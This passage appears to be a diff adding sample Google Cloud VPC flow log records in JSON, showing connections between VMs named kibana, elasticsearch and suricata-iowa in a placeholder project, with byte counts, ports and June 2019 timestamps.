+{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"67.43.156.13","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"67.43.156.13","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"67.43.156.13","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"67.43.156.13","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.168.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"67.43.156.13","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"67.43.156.13","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetw